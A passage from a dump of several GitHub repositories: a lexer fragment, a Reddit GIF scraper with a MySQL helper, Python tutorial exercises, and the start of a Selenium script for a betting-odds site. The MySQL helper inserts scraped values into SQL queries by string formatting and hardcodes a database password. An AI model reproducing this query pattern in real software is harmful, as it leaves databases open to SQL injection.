symbol = self.string[self.position]\n else:\n self.write_to_file(\"<{token}, {type}>\".format(token=self.string[start_position:self.position],\n type=id_alphabet_ab12))\n self.position -= 1\n self.get_token()\n\n def check_key_word_type(self):\n \"\"\"Checks if it is type key word\"\"\"\n word_to_check = self.dict_defines[key_word_type]\n start_position = self.position\n self.position += 1\n symbol = self.string[self.position]\n while symbol == word_to_check[self.position]:\n if self.position == len(word_to_check) - 1:\n self.write_to_file(\"<{token}, {type}>\".format(token=self.string[start_position:self.position + 1],\n type=key_word_type))\n self.get_token()\n break\n self.position += 1\n symbol = self.string[self.position]\n else:\n self.error(\"It is not a key word 'type'\")\n\n @staticmethod\n def write_to_file(message, *args):\n \"\"\"Write messages to a file\"\"\"\n with open(\"output.txt\", \"a+\") as file:\n file.write(message)\n file.write('\\n')\n for arg in args:\n file.write(arg)\n file.write('\\n')\n\n\nif __name__ == '__main__':\n line_num = 1\n with open(\"input.txt\", \"r\") as line_to_read:\n lines = line_to_read.readlines()\n os.remove(\"output.txt\")\n for line in lines:\n line_without_eof = line.split('\\n')[0]\n analyzer = LeksAnaliz(line=line_num, string=line_without_eof)\n analyzer.write_to_file(\"Line number %i\" % analyzer.line, \"The string is:\", analyzer.string, \"\")\n analyzer.get_token()\n line_num += 1\n" } ]
2
alexroyar/random-gif
https://github.com/alexroyar/random-gif
07aa8a71e58dc9c7c13458534492b861e1db697f
f255202f3752eed8bd114c2576fd8c871f95d32e
7b5cc6d2ddfe2549b9ffd6faec1287fcb7d731a8
refs/heads/master
2020-06-05T17:23:11.172607
2014-03-29T20:34:28
2014-03-29T20:34:28
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6242504715919495, "alphanum_fraction": 0.630912721157074, "avg_line_length": 22.46875, "blob_id": "883516c15cb68f9a2d666a5b8cf3cae9fc78bc5f", "content_id": "7ab107501ce313454b2010ecaef9fb81860d3f78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1505, "license_type": "no_license", "max_line_length": 86, "num_lines": 64, "path": "/database/pruebaMYSQL.py", "repo_name": "alexroyar/random-gif", "src_encoding": "UTF-8", "text": "#!usr/bin/python\n# -*- coding: utf-8 -*-\nimport MySQLdb as mdb\n\nDATABASE = 'test'\nTABLE = 'prueba'\n\nclass pruebaMYSQL:\n\t\"\"\"\n\t\tConstructor. No crea la base de datos ni nada.\n\t\"\"\"\n\tdef __init__(self):\n\t\tself.con = mdb.connect('localhost', 'fer', 'fer', DATABASE)\n\t\tself.cursor = self.con.cursor()\n\n\t\"\"\"\n\t\tCrea la tabla de turno. La vacía si existe.\n\t\"\"\"\n\tdef create_table(self, table):\n\t\tquery = \"DROP TABLE IF EXISTS %s\" % (table)\n\t\tself.cursor.execute(query);\n\t\tquery = \"CREATE TABLE %s(url VARCHAR(150) NOT NULL,\" % (table)\n\t\tquery += \"name VARCHAR(150) NOT NULL, PRIMARY KEY (url))\"\n\t\tself.cursor.execute(query);\n\n\t\"\"\"\n\t\tDesconexión de la base de datos.\n\t\"\"\"\n\tdef disconnect(self):\n\t\tif (self.con): self.con.close()\n\n\t\"\"\"\n\t\tAñade un elemento a la base de datos.\n\t\"\"\"\n\tdef insert_into_table(self, url, name):\n\t\ttry:\n\t\t\tquery = \"INSERT INTO %s values(%s, %s)\" % (TABLE, \"'\"+url+\"'\", \"'\"+name+\"'\")\n\t\t\tself.cursor.execute(query)\n\t\texcept Exception as e:\n\t\t\tprint \"Exception:\", e\n\n\t\"\"\"\n\t\tMete valores de relleno para hacer pruebas.\n\t\"\"\"\n\tdef insert_demo(self):\n\t\tfor i in range(0, 10): self.insert_into_table(\"http://%d.gif\" % i, \"IMG_%d.gif\" % i)\n\n\t\"\"\"\n\t\tDevuelve una lista de las filas de la tabla.\n\t\"\"\"\n\tdef get_all_rows(self):\n\t\tif (not self.con):\n\t\t\tprint \"No hay conexión.\"\n\t\t\treturn ()\n\n\t\tquery = \"SELECT * from %s\" % (TABLE)\n\t\tself.cursor.execute(query)\n\t\tres = self.cursor.fetchall()\n\t\treturn res\n\n#ddbb = pruebaMYSQL()\n#ddbb.create_table('prueba')\n#ddbb.insert_demo()\n#print ddbb.get_all_rows()" }, { "alpha_fraction": 0.6734846830368042, "alphanum_fraction": 0.6769767999649048, "avg_line_length": 24.37974739074707, "blob_id": "20597b367db35c90abe22aa740a368b82651ba77", "content_id": "3cbf4271a5fefc6f63210b8c8fdba340c45fa58f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4024, "license_type": "no_license", "max_line_length": 85, "num_lines": 158, "path": "/database/pruebaPRAW.py", "repo_name": "alexroyar/random-gif", "src_encoding": "UTF-8", "text": "#!usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport praw\nimport urllib\nimport time\nimport pruebaMYSQL as ddbb\n\nUSER_AGENT = \"GIF_Collector_Test_v0\" # Nombre de nuestro script.\nLIMIT = 25 # Peticiones que se hacen de golpe.\nSUB_REDDIT = \"gifs\" # Nombre del subreddit a explotar.\nSEPARATOR = \"/\"\t# Separador de URLs.\nPATH = \"images/\" # Ruta provisional de imágenes.\nTIME_SLEEP = 2 \t# Reddit pide dos segundos entre petición y petición.\n\n# Tipos\nGET_TOP_HOUR \t= 1\nGET_TOP_DAY \t= 2\nGET_TOP_WEEK \t= 3\nGET_TOP_MONTH \t= 4\n\ndef get_random_submission(save=False):\n\ttry:\n\t\tdicc = createDiccFromDB()\n\t\tconnection = praw.Reddit(user_agent = USER_AGENT)\n\t\tconnection_ddbb = ddbb.pruebaMYSQL()\n\t\n\t\twhile (True):\n\t\t\ttry:\n\t\t\t\t# Pilla un gif aleatorio.\n\t\t\t\tsub = connection.get_subreddit(SUB_REDDIT).get_random_submission()\n\t\t\t\t\n\t\t\t\t# Spliteamos su url.\n\t\t\t\turl = sub.url\n\t\t\t\tname = url.split(SEPARATOR)[-1]\n\n\t\t\t\t# Caso provisional de imágenes de imgur.\n\t\t\t\tif (not \".gif\" in name and \"imgur\" in url):\n\t\t\t\t\tprint \"Imagen especial. Añadimos terminación, a ver si cuela.\"\n\t\t\t\t\tprint name\n\t\t\t\t\tprint url\n\t\t\t\t\tname += \".gif\"\n\t\t\t\t\turl = \"http://i.imgur.com/\" + name\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t\t# Si no tenemos ya la imagen, la descargamos.\n\t\t\t\tif (not dicc.has_key(url)):\n\t\t\t\t\tdicc[url] = name\n\t\t\t\t\tconnection_ddbb.insert_into_table(url, name)\n\t\t\t\t\tif save: urllib.urlretrieve(url, PATH + name)\n\n\t\t\texcept Exception as exc:\n\t\t\t\tprint \"Exception In:\", exc\n\n\t\t\tfinally:\n\t\t\t\ttime.sleep(2)\n\n\texcept Exception as exc:\n\t\tprint \"Exception Out:\", exc\n\n\tfinally:\n\t\tprint \"Cerramos base de datos en el finally.\"\n\t\tconnection_ddbb.disconnect()\n\ndef get_top(type, num, save=False):\n\ttry:\n\t\tdicc = createDiccFromDB()\n\t\tconnection = praw.Reddit(user_agent = USER_AGENT)\n\t\tconnection_ddbb = ddbb.pruebaMYSQL()\n\n\t\tif (type == GET_TOP_HOUR):\n\t\t\tsubmissions = connection.get_subreddit(SUB_REDDIT).get_top_from_hour(limit = num)\n\t\telif (type == GET_TOP_DAY):\n\t\t\tsubmissions = connection.get_subreddit(SUB_REDDIT).get_top_from_day(limit = num)\n\t\telif (type == GET_TOP_WEEK):\n\t\t\tsubmissions = connection.get_subreddit(SUB_REDDIT).get_top_from_week(limit = num)\n\t\telif (type == GET_TOP_MONTH):\n\t\t\tsubmissions = connection.get_subreddit(SUB_REDDIT).get_top_from_month(limit = num)\n\t\telse:\n\t\t\traise Exception(\"Constante %d no definida.\" % type)\n\n\t\t# Recorremos los objetos Submission.\n\t\tfor sub in submissions:\n\t\t\t# Spliteamos su url.\n\t\t\turl = sub.url\n\t\t\tname = url.split(SEPARATOR)[-1]\n\t\t\t\n\t\t\t# Caso provisional de imágenes de imgur.\n\t\t\tif (not \".gif\" in name and \"imgur\" in url):\n\t\t\t\tprint \"Imagen especial. Añadimos terminación, a ver si cuela.\"\n\t\t\t\tprint name\n\t\t\t\tprint url\n\t\t\t\tname += \".gif\"\n\t\t\t\turl = \"http://i.imgur.com/\" + name\n\t\t\t\t\n\t\t\t# Si no tenemos ya la imagen, la descargamos.\n\t\t\tif (not dicc.has_key(url)):\n\t\t\t\tdicc[url] = name\n\t\t\t\tconnection_ddbb.insert_into_table(url, name)\n\t\t\t\tif save: urllib.urlretrieve(url, PATH + name)\n\n\n\texcept Exception as exc:\n\t\tprint \"Exception Out:\", exc\n\n\tfinally:\n\t\tprint \"Cerramos base de datos en el finally.\"\n\t\tconnection_ddbb.disconnect()\n\t\ttime.sleep(TIME_SLEEP)\n\n\"\"\"\n\tEncuentra las mejores imágenes de la última hora.\n\"\"\"\ndef get_top_from_hour(num=LIMIT):\n\tget_top(GET_TOP_HOUR, num)\n\n\"\"\"\n\tEncuentra las mejores imágenes del día.\n\"\"\"\ndef get_top_from_day(num=LIMIT):\n\tget_top(GET_TOP_DAY, num)\n\n\"\"\"\n\tEncuentra las mejores imágenes de la semana.\n\"\"\"\ndef get_top_from_week(num=LIMIT):\n\tget_top(GET_TOP_WEEK, num)\n\n\"\"\"\n\tEncuentra las mejores imágenes del mes.\n\"\"\"\ndef get_top_from_month(num=LIMIT):\n\tget_top(GET_TOP_MONTH, num)\n\n\"\"\"\n\tDevuelve un diccionario con el contenido de la DDBB.\n\"\"\"\ndef createDiccFromDB():\n\tconnection_ddbb = ddbb.pruebaMYSQL()\n\trows = connection_ddbb.get_all_rows()\n\tconnection_ddbb.disconnect()\n\t\n\tdiccionario = {}\n\tfor row in rows: diccionario[row[0]] = row[1]\n\t\n\tprint \"Diccionario tiene %d elementos.\" % len(diccionario)\n\treturn diccionario\n\ndef main():\n\t#createDiccFromDB()\n\tget_top_from_month()\n\tget_top_from_week()\n\tget_top_from_day()\n\tget_top_from_hour()\n\tget_random_submission()\n\n\nmain()" }, { "alpha_fraction": 0.6296296119689941, "alphanum_fraction": 0.6296296119689941, "avg_line_length": 12.5, "blob_id": "ebec1099ade75ed5dc05347927048a0e190598a6", "content_id": "32b8f37c8b85088a1a95fefb80c7ce2b38eca5e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 54, "license_type": "no_license", "max_line_length": 30, "num_lines": 4, "path": "/README.md", "repo_name": "alexroyar/random-gif", "src_encoding": "UTF-8", "text": "random-gif\n==========\n\nApp android para recibir gifs.\n" } ]
3
IT-17005/Python-Tutorial
https://github.com/IT-17005/Python-Tutorial
ee7d39556dbaec1303b6c520fca0937662fe14ed
21c80279ef435b22d63cac6fcc53678b625618e4
54274d699ccb95c7f2777b5b85ea86dbb6a673e9
refs/heads/main
2023-03-11T11:59:47.780708
2021-03-03T05:23:49
2021-03-03T05:23:49
343,999,243
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.580110490322113, "alphanum_fraction": 0.6049723625183105, "avg_line_length": 19.16666603088379, "blob_id": "42eacc385e555e8f5ab0e8789833b4f4a240f5a2", "content_id": "50e0a4acead0448c4f5ac5d8dbe5cca377bbdb21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 362, "license_type": "no_license", "max_line_length": 43, "num_lines": 18, "path": "/venv/countNumLetterWord.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "s = input(\"Enter the Text:\")\nnumOfDigit=0\nnumOfletter=0\nnumOfWord=0\nfor i in s:\n i=i.lower()\n if i>='a' and i<='z':\n numOfletter+=1\n\n elif i>='0' and i<='9':\n numOfDigit+=1\n\n elif i==' ':\n numOfWord+=1\n\nprint(\"The number of words:\",numOfWord+1)\nprint(\"The number of letters:\",numOfletter)\nprint(\"The number of Digit:\",numOfDigit)" }, { "alpha_fraction": 0.5780141949653625, "alphanum_fraction": 0.5992907881736755, "avg_line_length": 24.636363983154297, "blob_id": "87699db415633f2957a9a34212bb3f29538a98a6", "content_id": "d2a3a50baa70bac1433b0a889df5ae750f1a04ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 282, "license_type": "no_license", "max_line_length": 54, "num_lines": 11, "path": "/venv/GuessingGame.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "from random import randint\n\nfor x in range(1,6):\n num = int(input(\"Enter any number between 1-5: \"))\n randNum = randint(1,5)\n if num == randNum:\n print(\"I've Won the Game.\")\n else:\n print(\"I've lose the Game.\")\n\n print(\"The random number was:\",randNum)\n" }, { "alpha_fraction": 0.41791045665740967, "alphanum_fraction": 0.5074626803398132, "avg_line_length": 14, "blob_id": "901ca3d7dd5c304a8c7c8a8a7dc9689e320b327a", "content_id": "c9574447271349007cc3d8e99776d0053c675bca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 134, "license_type": "no_license", "max_line_length": 19, "num_lines": 9, "path": "/venv/matrix.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "matrix = [\n [1,1,2],\n [3,67,8],\n]\nmatrix[0][1] = 3\nprint(matrix[0][1])\nfor row in matrix:\n for col in row:\n print(col)" }, { "alpha_fraction": 0.4681818187236786, "alphanum_fraction": 0.5772727131843567, "avg_line_length": 21.100000381469727, "blob_id": "0f55c796a1e448327a22967ca7f33675e30100ad", "content_id": "4a706659fd76970498acedd767e4c6a667031083", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 220, "license_type": "no_license", "max_line_length": 44, "num_lines": 10, "path": "/venv/dictionary.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "student = {\n 101 : \"RUHAN\",\n \"102\" : \"Abdullah\",\n \"103\" : \"sultan\",\n \"104\" : \"ridom\",\n}\nprint(student.get(\"102\"))\nprint(student.get(\"103\"))\nprint(student.get(101))\nprint(student.get(\"106\",\"Not a valid key.\"))" }, { "alpha_fraction": 0.3642384111881256, "alphanum_fraction": 0.46357616782188416, "avg_line_length": 14.100000381469727, "blob_id": "758524f2dddfaf8744f36611f192c369a358135a", "content_id": "2d532be9d00d5bf910dff254cb396bd0e564767d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 151, "license_type": "no_license", "max_line_length": 32, "num_lines": 10, "path": "/venv/forloop.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "num = [2, 23, 4, 24, 54, 31, 12]\nl = len(num)\ni = 0\n# while i < l:\n# print(num[i])\n# i += 1\nsum = 0\nfor x in num:\n sum = sum + x\nprint(sum)\n" }, { "alpha_fraction": 0.447761207818985, "alphanum_fraction": 0.5746268630027771, "avg_line_length": 12.5, "blob_id": "0e7c72839b8801c2917dbd22f57a36b6cb6d4090", "content_id": "d47e906860f7afd538d2ccec4676cbb261578e90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 134, "license_type": "no_license", "max_line_length": 23, "num_lines": 10, "path": "/venv/xargs.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "#xargs(tuples)\ndef sum(*numbers):\n s=0\n for num in numbers:\n s=s+num\n print(s)\n\nsum(10,20)\nsum(10,20,45)\nsum(10,20,68)" }, { "alpha_fraction": 0.49056604504585266, "alphanum_fraction": 0.5408805012702942, "avg_line_length": 19, "blob_id": "760ef5212191b958224250c19e02f570a51f5b89", "content_id": "9fd7b9b81669c42be9a68693fa15ee0d9e27c134", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 159, "license_type": "no_license", "max_line_length": 53, "num_lines": 8, "path": "/venv/series.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "# 1+2+3+4+.......+n\n\nn= int(input(\"Enter the last number of the series:\"))\nsum=0\nfor x in range(1,n+1,1):\n sum+=x\n print(f\"{sum} +\",end=\" \")\n# print(sum)" }, { "alpha_fraction": 0.3181818127632141, "alphanum_fraction": 0.47727271914482117, "avg_line_length": 13, "blob_id": "4de908b14eebb20c22cdb207491a91c7a43fb91f", "content_id": "7d28b2e1a5d33d16a36da4e53d81c484304d614b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "no_license", "max_line_length": 26, "num_lines": 6, "path": "/venv/whileloop.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "num = [2,23,4,24,54,31,12]\nl = len(num)\ni = 0\nwhile i<l:\n print(num[i])\n i+=1\n " }, { "alpha_fraction": 0.5798319578170776, "alphanum_fraction": 0.6386554837226868, "avg_line_length": 16.14285659790039, "blob_id": "e0f3811fcc65e588c8f476b0375b198ede7e687f", "content_id": "f682c6cc908f0298b38faffa44fbdc20feee2e16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 119, "license_type": "no_license", "max_line_length": 30, "num_lines": 7, "path": "/map.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "# map(function, list)\ndef square(x):\n return x*x\n\nnum = [1,2,3,4,5,6,7]\nresult = list(map(square,num))\nprint(result)" }, { "alpha_fraction": 0.5660377144813538, "alphanum_fraction": 0.650943398475647, "avg_line_length": 12.375, "blob_id": "dbe9ab452ef62ce43a9c6ba9b1449207a7af000a", "content_id": "ceed7fba8e48edcfb6956e120b6b2279b33c8c76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 106, "license_type": "no_license", "max_line_length": 25, "num_lines": 8, "path": "/venv/Range.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "num = list(range(10))\nprint(num)\n\nnum = list(range(1,10))\nprint(num)\n\nnum = list(range(1,10,2))\nprint(num)" }, { "alpha_fraction": 0.5267175436019897, "alphanum_fraction": 0.5877862572669983, "avg_line_length": 13.666666984558105, "blob_id": "db6c9f3d6b92d93546bf6aaeab276f01d400e4e7", "content_id": "0f1d988285e2f9830dd2ad213eeb3e4f4551c95e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 131, "license_type": "no_license", "max_line_length": 23, "num_lines": 9, "path": "/venv/tuples.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "student = (\n \"ruhan\",\n (\"abdul karim\",27,3.66),\n \"masud\"\n)\nprint(student)\nprint(student[0])\nprint(student[2])\nprint(student[1])" }, { "alpha_fraction": 0.47560974955558777, "alphanum_fraction": 0.6524389982223511, "avg_line_length": 15.5, "blob_id": "1b37747c2e1cc6e118c6c7b6abff80b3a11673a7", "content_id": "3bdb91ed5d30e2009c9d238d02ee532e2db3ce58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 164, "license_type": "no_license", "max_line_length": 22, "num_lines": 10, "path": "/venv/set.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "num1 = {1,2,3,4,5,6}\nnum2 = set([1,2,38,9])\nnum1.add(11)\nnum1.remove(11)\nprint(11 not in num1)\nprint(num2)\n\nprint(num1 | num2)\nprint(num1 & num2)\nprint(num1 - num2)" }, { "alpha_fraction": 0.6356275081634521, "alphanum_fraction": 0.6437246799468994, "avg_line_length": 19.66666603088379, "blob_id": "1b41f02ca0c4968c176997fcf436d3e80e33414f", "content_id": "2ad12ea3339df420a7ea4971293edb00b122adf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 269, "license_type": "no_license", "max_line_length": 40, "num_lines": 12, "path": "/venv/stack.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "books = []\nbooks.append(\"সি++\")\nbooks.append(\"জাভা\")\nbooks.append(\"পাইথন\")\nprint(books)\nbooks.pop()\nprint(\"Now the top books is:\",books[-1])\nbooks.pop()\nprint(\"Now the top books is:\",books[-1])\nbooks.pop()\nif not books:\n print(\"No books left.\")" }, { "alpha_fraction": 0.5309734344482422, "alphanum_fraction": 0.5752212405204773, "avg_line_length": 15.142857551574707, "blob_id": "49c80d9d3002df6a949630a02a35ca800ccfbb80", "content_id": "b6345bf3b44e6e2307de4bf4f3d965995a72c228", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 113, "license_type": "no_license", "max_line_length": 23, "num_lines": 7, "path": "/venv/debug.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "#xargs(tuples)\ndef sum(*numbers):\n s=0\n for num in numbers:\n s=s+num\n return s\nprint(sum(10,20))\n" }, { "alpha_fraction": 0.6927374005317688, "alphanum_fraction": 0.6927374005317688, "avg_line_length": 17, "blob_id": "2159d45c19191b8857aabbc95e0a42ce34a71a62", "content_id": "28ce104731fdb26717853e3c6f20b4c18a7ae05c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 179, "license_type": "no_license", "max_line_length": 29, "num_lines": 10, "path": "/venv/queue.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "from collections import deque\nname = deque([\"x\",\"y\",\"z\"])\nprint(name)\nname.popleft()\nprint(name)\nname.popleft()\nprint(name)\nname.popleft()\nif not name:\n print(\"No person left\")" }, { "alpha_fraction": 0.4888888895511627, "alphanum_fraction": 0.6296296119689941, "avg_line_length": 21.66666603088379, "blob_id": "9902ca409c84aa4afe8bb9cdec4afab52a97fcae", "content_id": "aa969a2e83f4c2e4355549c9213fc28fcc3c2ee1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 135, "license_type": "no_license", "max_line_length": 51, "num_lines": 6, "path": "/venv/stringToNum.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "n = input(\"Enter a text of number:\")#12 12 32 43 54\nlist = n.split()#12, 12, 32, 43\nsum=0\nfor num in list:\n sum+=int(num)\nprint(sum)" } ]
16
Alirezaprogramerrd99/SMTP-MailClient
https://github.com/Alirezaprogramerrd99/SMTP-MailClient
da676b87d8f71f2569174d74d2fe8d5a0a4a6bde
a6d75ddd8521118d667bfda71bfe85d6ae50baf0
5762029336a12b0fca1f235db8334e7d88930a79
refs/heads/main
2023-04-08T22:44:44.299888
2021-04-19T17:27:33
2021-04-19T17:27:33
359,542,078
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6199480295181274, "alphanum_fraction": 0.6549279093742371, "avg_line_length": 31.0546875, "blob_id": "b7578dc700a9b818b169994be38dd4353bad4226", "content_id": "db539c1dbcc2c535bf1d1876db9171a9f7a16804", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4231, "license_type": "no_license", "max_line_length": 86, "num_lines": 128, "path": "/SMTP-MailClient.py", "repo_name": "Alirezaprogramerrd99/SMTP-MailClient", "src_encoding": "UTF-8", "text": "from socket import *\r\nimport ssl\r\nimport base64\r\n\r\n# ------------------------- SMTP Commands -------------------------------\r\nEND_MSG = \"\\r\\n.\\r\\n\"\r\nFORMAT = 'ascii'\r\nQUIT_CMD = 'QUIT\\r\\n'\r\nHELLO_CMD = 'HELO gmail.com\\r\\n'\r\nSTARTTLS_CMD = 'STARTTLS\\r\\n'\r\nAUTHORIZATION_CMD = \"AUTH LOGIN\\r\\n\"\r\nMAIL_FROM = 'MAIL FROM: <Sender@gmail.com> \\r\\n' # fill this part with sender's gmail address.\r\nRCPT_TO = 'RCPT TO: <Receiver@gmail.com> \\r\\n' # fill this part with receiver's gmail address.\r\nDATA_CMD = 'DATA\\r\\n'\r\n# ------------------------------------------------------------------------\r\n\r\nlogin_username = 'Example@gmail.com' # your gmail username (sender gmail.)\r\nlogin_password = 'blablabla' # your gmail password\r\n# ------------------------------------------------------------------------\r\n\r\n# tuple = server hostname , connection port from server.\r\nmailserver1 = (\"smtp.gmail.com\", 587)\r\n\r\n# Create socket called clientSocket and establish a TCP connection with mailserver\r\nclientSocket = socket(AF_INET, SOCK_STREAM)\r\nclientSocket.connect(mailserver1)\r\n\r\nrecv = clientSocket.recv(1024).decode(FORMAT)\r\n\r\nprint(\"\\nServer message after connection request: \" + recv)\r\nif recv[:3] != '220':\r\n print('220 reply not received from server.')\r\n\r\n# ----Send HELO command and print server response.\r\n\r\nclientSocket.send(HELLO_CMD.encode())\r\nrecv1 = clientSocket.recv(1024).decode(FORMAT)\r\nprint('Server response after HELO: ' + recv1)\r\n\r\nif recv1[:3] != '250':\r\n print('250 reply not received from server.')\r\n\r\n# ----start TLS\r\nclientSocket.send(STARTTLS_CMD.encode())\r\nrecv = clientSocket.recv(1024).decode(FORMAT)\r\nprint('Server response after STARTTLS: ' + recv)\r\n\r\nif recv[:3] != '220':\r\n print(\"220 reply not received from server.\")\r\n\r\n# ----Secure socket with ssl\r\nsslClientSocket = ssl.wrap_socket(clientSocket)\r\n\r\n# ----user authentication part\r\nsslClientSocket.send(AUTHORIZATION_CMD.encode())\r\nrecv = sslClientSocket.recv(1024).decode(FORMAT)\r\nprint('Server response after AUTH LOGIN: ' + recv)\r\n\r\nif recv[:3] != '334':\r\n print(\"334 Not received from the server\")\r\n\r\n# ----sending username for authorization\r\n\r\nsslClientSocket.send(\r\n (base64.b64encode(login_username.encode())) + '\\r\\n'.encode())\r\nrecv = sslClientSocket.recv(1024).decode(FORMAT)\r\nprint('Server response after sending username: ' + recv)\r\n\r\n# ----sending username for authorization\r\nsslClientSocket.send(\r\n (base64.b64encode(login_password.encode())) + '\\r\\n'.encode())\r\nrecv = sslClientSocket.recv(1024).decode(FORMAT)\r\nprint('Server response after sending password: ' + recv)\r\n\r\nif recv[:3] != '235':\r\n print(\"235 Not received from the server\")\r\n\r\n\r\nsslClientSocket.send(MAIL_FROM.encode())\r\nrecv2 = sslClientSocket.recv(1024).decode(FORMAT)\r\nprint(\"Server response After MAIL FROM command: \"+recv2)\r\n\r\nif recv1[:3] != '250':\r\n print('250 reply not received from server.')\r\n\r\n# ----Send RCPT TO command and print server response.\r\n\r\nsslClientSocket.send(RCPT_TO.encode())\r\nrecv3 = sslClientSocket.recv(1024).decode()\r\nprint(\"Server response After RCPT TO command: \"+recv3)\r\n\r\nif recv1[:3] != '250':\r\n print('250 reply not received from server.')\r\n\r\n# ----Send DATA command and print server response.\r\n\r\nsslClientSocket.send(DATA_CMD.encode())\r\nrecv4 = sslClientSocket.recv(1024).decode(FORMAT)\r\nprint(\"Server response After DATA command: \" + recv4)\r\n\r\nif recv4[:3] != '354':\r\n print('354 reply not received from server.')\r\n\r\n# ----Send message data.\r\nsubject = \"Subject: SMTP mail client testing \\r\\n\\r\\n\"\r\nsslClientSocket.send(subject.encode())\r\nmessage = input(\"\\nEnter your message: \")\r\nmessage = (str(message) + '\\r\\n').encode()\r\n\r\nsslClientSocket.send(message)\r\nsslClientSocket.send(END_MSG.encode())\r\nrecv_msg = sslClientSocket.recv(1024)\r\n\r\nprint(\"\\nServer response after sending message body: \" + recv_msg.decode())\r\n\r\nif recv1[:3] != '250':\r\n print('250 reply not received from server.')\r\n\r\n# ----Send QUIT command and get server response.\r\nsslClientSocket.send(QUIT_CMD.encode())\r\nmessage = sslClientSocket.recv(1024)\r\nprint('Server response after QUIT: ' + message.decode())\r\n\r\nif message[:9] != '221 2.0.0':\r\n print('221 2.0.0 Not received from the server')\r\n\r\nsslClientSocket.close()\r\nprint('Email sent successfully :)')\r\n" } ]
1
iholdroyd/oddsmonkey_eachway_calculator_automation
https://github.com/iholdroyd/oddsmonkey_eachway_calculator_automation
ae37d52c749772412b3a359ab61d1f400a9364e1
6f93340e897e053c4dfa9af70e5f72955d919759
55cdcb2b3b3f755bfe23883f630d0fc666bd1858
refs/heads/master
2022-12-02T23:02:22.303058
2020-08-16T18:45:19
2020-08-16T18:45:19
276,960,121
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6271089315414429, "alphanum_fraction": 0.6525593400001526, "avg_line_length": 52, "blob_id": "977c12c2b5be6908f3158363066c1afc920ff464", "content_id": "5b96806a6acdb1b0b195f04cd6631e416a18a0a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3497, "license_type": "no_license", "max_line_length": 176, "num_lines": 66, "path": "/script.py", "repo_name": "iholdroyd/oddsmonkey_eachway_calculator_automation", "src_encoding": "UTF-8", "text": "from selenium import webdriver \nfrom selenium.webdriver.common.keys import Keys\nimport time\nfrom selenium.webdriver.chrome.options import Options\nimport os\nimport datetime\n\nUSERNAME = #yourusername\nPASSWORD = #yourpassword\nTIMEDIFFERENCE = 5\nCHROMEDRIVER_PATH= #path to your chromedriver. E.g. mine is '/Users/ian/Downloads/chromedriver.\n\ndef notify(title, subtitle, message):\n t = '-title {!r}'.format(title)\n s = '-subtitle {!r}'.format(subtitle)\n m = '-message {!r}'.format(message)\n os.system('terminal-notifier {}'.format(' '.join([m, t, s])))\n\ndef is_time_in_5(race):\n race = str(race).split(\" \")\n racetime= race[1]\n racetime = datetime.datetime.strptime(racetime, '%H:%M')\n timein5 = datetime.datetime.now() + datetime.timedelta(minutes=TIMEDIFFERENCE)\n timein5 = timein5.strftime(\"%H:%M\")\n timein5 = datetime.datetime.strptime(timein5, '%H:%M')\n return racetime <= timein5\n\n\n#login and navigate to the eachway matcher\noptions = Options()\noptions.add_argument(\"--disable-notifications\")\ndriver = webdriver.Chrome(executable_path=CHROMEDRIVER_PATH, chrome_options=options)\ndriver.get('https://www.oddsmonkey.com/Tools/Matchers/EachwayMatcher.aspx') 